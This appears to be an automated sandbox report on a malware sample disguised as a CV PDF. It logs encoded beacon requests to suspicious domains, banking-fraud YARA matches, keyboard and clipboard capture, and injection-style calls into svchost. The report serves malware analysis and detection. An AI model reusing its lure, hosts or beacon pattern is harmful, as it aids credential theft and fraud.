            Source: global trafficHTTP traffic detected: GET /gwo6/?46X=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bguu/?46X=wpZ2zrhVCI3JLgG0fmBBss6LPjHlWe1w/JFFDzKF+V7h32CQ3OMTdOkGE8NCHKIXe6YEJzSxYnSm/JZ2Z7T7gNAl4zG8Smso5QFplpDKnUXP2BcIMSrtmpg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.agistaking.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gtvh/?46X=svsS4k9aWb1fxOJWFdqD4ZHZO8ProC7QnMiFRAA+Jn47YSp+JrMAdMKfG3E9ev5xwfTou5frDELSSoA0/vSCvrqCDlCfzUQB/UWtrKGfrZiks1Cnj9TArQE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.leadmagnetkpis.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9x20/?46X=lomPZfbkX5/Tg+6jmw8dyMDkjP4NXk0abi78pjf9+/jRa8r0UKnkgOsbdV67hnlDhoKnZ5+zibRYdRwwM6kGhJJ3GpxF1D+e7zNnDN/YPp88POfC8mTtY1w=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: unknownHTTP traffic detected: POST /idtdeni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 862
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:17 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 14 Mar 2025 07:24:45 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:06 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:08 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:25:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-alive
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 1251; date: Fri, 14 Mar 2025 07:25:11 GMT; server: LiteSpeed
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 1251; date: Fri, 14 Mar 2025 07:25:19 GMT; server: LiteSpeed
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

            E-Banking Fraud

            Source: Yara matchFile source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000000.1161101843.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5b3e2f6-3
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000000.1161101843.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_048895c7-8
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c69d0902-a
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d0da1ef9-3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CBC3 NtClose,3_2_0042CBC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72B60 NtClose,LdrInitializeThunk,3_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A735C0 NtCreateMutant,LdrInitializeThunk,3_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A74340 NtSetContextThread,3_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A74650 NtSuspendThread,3_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BA0 NtEnumerateValueKey,3_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72B80 NtQueryInformationFile,3_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BE0 NtQueryValueKey,3_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BF0 NtAllocateVirtualMemory,3_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AB0 NtWaitForSingleObject,3_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AF0 NtWriteFile,3_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AD0 NtReadFile,3_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FA0 NtQuerySection,3_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FB0 NtResumeThread,3_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F90 NtProtectVirtualMemory,3_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FE0 NtCreateFile,3_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F30 NtCreateSection,3_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F60 NtCreateProcessEx,3_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72EA0 NtAdjustPrivilegesToken,3_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72E80 NtReadVirtualMemory,3_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72EE0 NtQueueApcThread,3_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72E30 NtWriteVirtualMemory,3_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DB0 NtEnumerateKey,3_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DD0 NtDelayExecution,3_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D30 NtUnmapViewOfSection,3_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D00 NtSetInformationFile,3_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D10 NtMapViewOfSection,3_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CA0 NtQueryInformationToken,3_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CF0 NtOpenProcess,3_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CC0 NtQueryVirtualMemory,3_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C00 NtQueryInformationProcess,3_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C60 NtCreateKey,3_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C70 NtFreeVirtualMemory,3_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73090 NtSetValueKey,3_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73010 NtOpenDirectoryObject,3_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A739B0 NtGetContextThread,3_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73D10 NtOpenProcessToken,3_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73D70 NtOpenThread,3_2_03A73D70
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5b796eff430b0ac5.bin
            Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00420AE3 appears 70 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00407DE1 appears 35 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00428900 appears 42 times
            Source: updater.exe0.1.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
            Source: OneDriveSetup.exe.1.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
            Source: pwahelper.exe0.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_proxy.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: setup.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: elevation_service.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedgewebview2.exe.1.drStatic PE information: Number of sections : 14 > 10
            Source: pwahelper.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: identity_helper.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: ie_to_edge_stub.exe.1.drStatic PE information: Number of sections : 11 > 10
            Source: msedge_proxy.exe0.1.drStatic PE information: Number of sections : 12 > 10
            Source: notification_click_helper.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173252696.00000000042E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172078278.000000000434D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1163229529.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1180269056.0000000004220000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167219276.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs CV_Sales Representative - Job Request PDF.exe
            Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: plugin-container.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: private_browsing.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaw.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaws.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jjs.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jp2launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: keytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: kinit.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: klist.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ktab.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: orbd.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3Help.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SciTE.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AdobeARMHelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msdtc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msiexec.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PerceptionSimulationService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: perfhost.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: policytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmid.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmiregistry.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: servertool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssvagent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
